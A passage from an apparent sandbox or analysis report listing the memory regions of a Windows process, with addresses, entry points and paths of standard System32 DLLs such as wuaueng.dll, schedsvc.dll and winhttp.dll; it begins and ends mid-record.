0x7ff86f63dfff monitored = 0 entry_point = 0x7ff86f5e5080 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 925 start_va = 0x7ff86f640000 end_va = 0x7ff86f65ffff monitored = 0 entry_point = 0x7ff86f641f50 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 926 start_va = 0x7ff86f660000 end_va = 0x7ff86f668fff monitored = 0 entry_point = 0x7ff86f6618f0 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 927 start_va = 0x7ff86f670000 end_va = 0x7ff86f680fff monitored = 0 entry_point = 0x7ff86f671d30 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 928 start_va = 0x7ff86f6a0000 end_va = 0x7ff86f6b7fff monitored = 0 entry_point = 0x7ff86f6a4e10 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 929 start_va = 0x7ff86f6c0000 end_va = 0x7ff86f6e4fff monitored = 0 entry_point = 0x7ff86f6c5ca0 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 930 start_va = 0x7ff870370000 end_va = 0x7ff8703b0fff monitored = 0 entry_point = 0x7ff870373750 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 931 start_va = 0x7ff8703c0000 end_va = 0x7ff8704b2fff monitored = 0 entry_point = 0x7ff8703e5d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 932 start_va = 0x7ff8704c0000 end_va = 0x7ff87050bfff monitored = 0 entry_point = 0x7ff8704d5310 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 933 start_va = 0x7ff870690000 end_va = 0x7ff8706a7fff monitored = 0 entry_point = 0x7ff870692000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 934 start_va = 0x7ff8706b0000 end_va = 0x7ff870831fff monitored = 0 entry_point = 0x7ff8706c82a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 935 start_va = 0x7ff870c70000 end_va = 0x7ff870ceefff monitored = 0 entry_point = 0x7ff870c87110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 936 start_va = 0x7ff870cf0000 end_va = 0x7ff870d2bfff monitored = 0 entry_point = 0x7ff870cf6aa0 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 937 start_va = 0x7ff870d80000 end_va = 0x7ff870d89fff monitored = 0 entry_point = 0x7ff870d81350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 938 start_va = 0x7ff870dc0000 end_va = 0x7ff870dcbfff monitored = 0 entry_point = 0x7ff870dc35c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 939 start_va = 0x7ff872410000 end_va = 0x7ff872418fff monitored = 0 entry_point = 0x7ff8724121d0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 940 start_va = 0x7ff872420000 end_va = 0x7ff872454fff monitored = 0 entry_point = 0x7ff87242a270 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 941 start_va = 0x7ff872540000 end_va = 0x7ff8727b9fff monitored = 0 entry_point = 0x7ff87255a7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 942 start_va = 0x7ff8727c0000 end_va = 0x7ff8727fffff monitored = 0 entry_point = 0x7ff8727d6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 943 start_va = 0x7ff872a10000 end_va = 0x7ff872a1ffff monitored = 0 entry_point = 0x7ff872a11690 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 944 start_va = 0x7ff872a20000 end_va = 0x7ff872a32fff monitored = 0 entry_point = 0x7ff872a21b10 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 945 start_va = 0x7ff872a40000 end_va = 0x7ff872ac1fff monitored = 0 entry_point = 0x7ff872a41790 region_type = mapped_file name = "newdev.dll" filename = "\\Windows\\System32\\newdev.dll" (normalized: "c:\\windows\\system32\\newdev.dll") Region: id = 946 start_va = 0x7ff872ad0000 end_va = 0x7ff872e09fff monitored = 0 entry_point = 0x7ff872ad8520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 947 start_va = 0x7ff872e10000 end_va = 0x7ff872e93fff monitored = 0 entry_point = 0x7ff872e22830 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 948 start_va = 0x7ff872ea0000 end_va = 0x7ff872f04fff monitored = 0 entry_point = 0x7ff872eb3170 region_type = mapped_file name = "wuuhext.dll" filename = "\\Windows\\System32\\wuuhext.dll" (normalized: "c:\\windows\\system32\\wuuhext.dll") Region: id = 949 start_va = 0x7ff872f10000 end_va = 0x7ff873208fff monitored = 0 entry_point = 0x7ff872fd7280 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 950 start_va = 0x7ff873210000 end_va = 0x7ff873445fff monitored = 0 entry_point = 0x7ff87329a450 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 951 start_va = 0x7ff873450000 end_va = 0x7ff873471fff monitored = 0 entry_point = 0x7ff873462540 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 952 start_va = 0x7ff873480000 end_va = 0x7ff873554fff monitored = 0 entry_point = 0x7ff87349cf80 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 953 start_va = 0x7ff873620000 end_va = 0x7ff8736b3fff monitored = 0 entry_point = 0x7ff873659210 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 954 start_va = 0x7ff8736c0000 end_va = 0x7ff873962fff monitored = 0 entry_point = 0x7ff8736e6190 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 955 start_va = 0x7ff873970000 end_va = 0x7ff873985fff monitored = 0 entry_point = 0x7ff87397b550 region_type = mapped_file name = "clipc.dll" filename = "\\Windows\\System32\\Clipc.dll" (normalized: "c:\\windows\\system32\\clipc.dll") Region: id = 956 start_va = 0x7ff8744b0000 end_va = 0x7ff8744c1fff monitored = 0 entry_point = 0x7ff8744b3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 957 start_va = 0x7ff874540000 end_va = 0x7ff87455afff monitored = 0 entry_point = 0x7ff874541040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 958 start_va = 0x7ff874830000 end_va = 0x7ff874839fff monitored = 0 entry_point = 0x7ff8748314c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 959 start_va = 0x7ff874a90000 end_va = 0x7ff874a9dfff monitored = 0 entry_point = 0x7ff874a91460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 960 start_va = 0x7ff874aa0000 end_va = 0x7ff874aaffff monitored = 0 entry_point = 0x7ff874aa1700 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 961 start_va = 0x7ff874ab0000 end_va = 0x7ff874ac4fff monitored = 0 entry_point = 0x7ff874ab2dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 962 start_va = 0x7ff874ad0000 end_va = 0x7ff874ad8fff monitored = 0 entry_point = 0x7ff874ad1ed0 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 963 start_va = 0x7ff874ae0000 end_va = 0x7ff874b0cfff monitored = 0 entry_point = 0x7ff874ae2290 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 964 start_va = 0x7ff874b10000 end_va = 0x7ff874b61fff monitored = 0 entry_point = 0x7ff874b138e0 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 965 start_va = 0x7ff874d60000 end_va = 0x7ff874d74fff monitored = 0 entry_point = 0x7ff874d63460 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 966 start_va = 0x7ff874e50000 end_va = 0x7ff874f0ffff monitored = 0 entry_point = 0x7ff874e7fd20 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 967 start_va = 0x7ff874f10000 end_va = 0x7ff874fa9fff monitored = 0 entry_point = 0x7ff874f2ada0 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 968 start_va = 0x7ff874fc0000 end_va = 0x7ff875026fff monitored = 0 entry_point = 0x7ff874fc63e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 969 start_va = 0x7ff875080000 end_va = 0x7ff8750c0fff monitored = 0 entry_point = 0x7ff875084840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 970 start_va = 0x7ff8750d0000 end_va = 0x7ff8750dafff monitored = 0 entry_point = 0x7ff8750d1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 971 start_va = 0x7ff875200000 end_va = 0x7ff87522dfff monitored = 0 entry_point = 0x7ff875207550 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 972 start_va = 0x7ff875230000 end_va = 0x7ff875245fff monitored = 0 entry_point = 0x7ff875231b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 973 start_va = 0x7ff875250000 end_va = 0x7ff875269fff monitored = 0 entry_point = 0x7ff875252430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 974 start_va = 0x7ff875270000 end_va = 0x7ff875285fff monitored = 0 entry_point = 0x7ff8752719f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 975 start_va = 0x7ff875290000 end_va = 0x7ff87529cfff monitored = 0 entry_point = 0x7ff875292ca0 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 976 start_va = 0x7ff8752a0000 end_va = 0x7ff8752cefff monitored = 0 entry_point = 0x7ff8752a8910 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 977 start_va = 0x7ff875320000 end_va = 0x7ff875405fff monitored = 0 entry_point = 0x7ff87533cf10 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 978 start_va = 0x7ff875480000 end_va = 0x7ff8754b7fff monitored = 0 entry_point = 0x7ff875498cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 979 start_va = 0x7ff875560000 end_va = 0x7ff875573fff monitored = 0 entry_point = 0x7ff875562d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 980 start_va = 0x7ff875860000 end_va = 0x7ff8758f2fff monitored = 0 entry_point = 0x7ff875869680 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 981 start_va = 0x7ff875a10000 end_va = 0x7ff875a28fff monitored = 0 entry_point = 0x7ff875a14520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 982 start_va = 0x7ff875b40000 end_va = 0x7ff875b4ffff monitored = 0 entry_point = 0x7ff875b42c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 983 start_va = 0x7ff875c60000 end_va = 0x7ff875ccdfff monitored = 0 entry_point = 0x7ff875c67f60 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 984 start_va = 0x7ff875d20000 end_va = 0x7ff875d30fff monitored = 0 entry_point = 0x7ff875d23320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 985 start_va = 0x7ff875d40000 end_va = 0x7ff875d80fff monitored = 0 entry_point = 0x7ff875d57eb0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 986 start_va = 0x7ff875d90000 end_va = 0x7ff875e8bfff monitored = 0 entry_point = 0x7ff875dc6df0 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 987 start_va = 0x7ff8764e0000 end_va = 0x7ff876861fff monitored = 0 entry_point = 0x7ff876531220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 988 start_va = 0x7ff876870000 end_va = 0x7ff8769a5fff monitored = 0 entry_point = 0x7ff87689f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 989 start_va = 0x7ff8779f0000 end_va = 0x7ff877a98fff monitored = 0 entry_point = 0x7ff877a19010 region_type = mapped_file name = "windows.ui.dll" filename = "\\Windows\\System32\\Windows.UI.dll" (normalized: "c:\\windows\\system32\\windows.ui.dll") Region: id = 990 start_va = 0x7ff877aa0000 end_va = 0x7ff877badfff monitored = 0 entry_point = 0x7ff877aeeaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 991 start_va = 0x7ff878150000 end_va = 0x7ff87815bfff monitored = 0 entry_point = 0x7ff878152830 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 992 start_va = 0x7ff878230000 end_va = 0x7ff8782eefff monitored = 0 entry_point = 0x7ff878251c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 993 start_va = 0x7ff8782f0000 end_va = 0x7ff87830efff monitored = 0 entry_point = 0x7ff8782f4960 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 994 start_va = 0x7ff878310000 end_va = 0x7ff878326fff monitored = 0 entry_point = 0x7ff878315630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 995 start_va = 0x7ff878330000 end_va = 0x7ff8783ddfff monitored = 0 entry_point = 0x7ff8783480c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 996 start_va = 0x7ff8783e0000 end_va = 0x7ff8783f1fff monitored = 0 entry_point = 0x7ff8783e9260 region_type = mapped_file name = "rilproxy.dll" filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll") Region: id = 997 start_va = 0x7ff878400000 end_va = 0x7ff8784b0fff monitored = 0 entry_point = 0x7ff8784788b0 region_type = mapped_file name = "cellularapi.dll" filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll") Region: id = 998 start_va = 0x7ff8784c0000 end_va = 0x7ff8784e4fff monitored = 0 entry_point = 0x7ff8784d2f20 region_type = mapped_file name = "wificonnapi.dll" filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll") Region: id = 999 start_va = 0x7ff8784f0000 end_va = 0x7ff878500fff monitored = 0 entry_point = 0x7ff8784f7ea0 region_type = mapped_file name = "dcpapi.dll" filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll") Region: id = 1000 start_va = 0x7ff878510000 end_va = 0x7ff87854dfff monitored = 0 entry_point = 0x7ff87851a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1001 start_va = 0x7ff878550000 end_va = 0x7ff878576fff monitored = 0 entry_point = 0x7ff878553bf0 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 1002 start_va = 0x7ff878580000 end_va = 0x7ff8785f9fff monitored = 0 entry_point = 0x7ff8785a7630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1003 start_va = 0x7ff878600000 end_va = 0x7ff878612fff monitored = 0 entry_point = 0x7ff8786057f0 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 1004 start_va = 0x7ff878620000 end_va = 0x7ff878639fff monitored = 0 entry_point = 0x7ff878622cf0 region_type = mapped_file name = "locationpelegacywinlocation.dll" filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll") Region: id = 1005 start_va = 0x7ff878640000 end_va = 0x7ff878694fff monitored = 0 entry_point = 0x7ff87864fc00 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 1006 start_va = 0x7ff8786a0000 end_va = 0x7ff8786a9fff monitored = 0 entry_point = 0x7ff8786a1660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1007 start_va = 0x7ff8786b0000 end_va = 0x7ff8786c7fff monitored = 0 entry_point = 0x7ff8786b5910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1008 start_va = 0x7ff8786d0000 end_va = 0x7ff87881cfff monitored = 0 entry_point = 0x7ff878713da0 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 1009 start_va = 0x7ff878820000 end_va = 0x7ff87882bfff monitored = 0 entry_point = 0x7ff8788214d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 1010 start_va = 0x7ff878830000 end_va = 0x7ff878884fff monitored = 0 entry_point = 0x7ff878833fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 1011 start_va = 0x7ff878890000 end_va = 0x7ff8788c6fff monitored = 0 entry_point = 0x7ff878896020 region_type = mapped_file name = "gnssadapter.dll" filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll") Region: id = 1012 start_va = 0x7ff8788d0000 end_va = 0x7ff8788effff monitored = 0 entry_point = 0x7ff8788d39a0 region_type = mapped_file name = "locationwinpalmisc.dll" filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll") Region: id = 1013 start_va = 0x7ff8788f0000 end_va = 0x7ff878953fff monitored = 0 entry_point = 0x7ff878905ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1014 start_va = 0x7ff878b20000 end_va = 0x7ff878be7fff monitored = 0 entry_point = 0x7ff878b613f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1015 start_va = 0x7ff878bf0000 end_va = 0x7ff878c50fff monitored = 0 entry_point = 0x7ff878bf4b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 1016 start_va = 0x7ff878c60000 end_va = 0x7ff878ddbfff monitored = 0 entry_point = 0x7ff878cb1650 region_type = mapped_file name = "locationframework.dll" filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll") Region: id = 1017 start_va = 0x7ff878de0000 end_va = 0x7ff878deafff monitored = 0 entry_point = 0x7ff878de1770 region_type = mapped_file name = "lfsvc.dll" filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll") Region: id = 1018 start_va = 0x7ff878e80000 end_va = 0x7ff878f11fff monitored = 0 entry_point = 0x7ff878eca780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 1019 start_va = 0x7ff878fc0000 end_va = 0x7ff878fe8fff monitored = 0 entry_point = 0x7ff878fcca00 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1020 start_va = 0x7ff878ff0000 end_va = 0x7ff879025fff monitored = 0 entry_point = 0x7ff879000070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1021 start_va = 0x7ff879c90000 end_va = 0x7ff87a122fff monitored = 0 entry_point = 0x7ff879c9f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1022 start_va = 0x7ff87a130000 end_va = 0x7ff87a196fff monitored = 0 entry_point = 0x7ff87a14e710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 1023 start_va = 0x7ff87a1f0000 end_va = 0x7ff87a1f7fff monitored = 0 entry_point = 0x7ff87a1f13e0 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 1024 start_va = 0x7ff87aa90000 end_va = 0x7ff87ab08fff monitored = 0 entry_point = 0x7ff87aaafb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1025 start_va = 0x7ff87ab10000 end_va = 0x7ff87ac95fff monitored = 0 entry_point = 0x7ff87ab5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1026 start_va = 0x7ff87aca0000 end_va = 0x7ff87acbbfff monitored = 0 entry_point = 0x7ff87aca37a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1027 start_va = 0x7ff87ad00000 end_va = 0x7ff87ad12fff monitored = 0 entry_point = 0x7ff87ad02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1028 start_va = 0x7ff87ade0000 end_va = 0x7ff87adeafff monitored = 0 entry_point = 0x7ff87ade1de0 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 1029 start_va = 0x7ff87ae70000 end_va = 0x7ff87aeaffff monitored = 0 entry_point = 0x7ff87ae81960 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 1030 start_va = 0x7ff87af40000 end_va = 0x7ff87afd5fff monitored = 0 entry_point = 0x7ff87af65570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1031 start_va = 0x7ff87afe0000 end_va = 0x7ff87b006fff monitored = 0 entry_point = 0x7ff87afe7940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1032 start_va = 0x7ff87b030000 end_va = 0x7ff87b0d9fff monitored = 0 entry_point = 0x7ff87b057910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1033 start_va = 0x7ff87b0e0000 end_va = 0x7ff87b1dffff monitored = 0 entry_point = 0x7ff87b120f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 1034 start_va = 0x7ff87b270000 end_va = 0x7ff87b27bfff monitored = 0 entry_point = 0x7ff87b272480 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1035 start_va = 0x7ff87b340000 end_va = 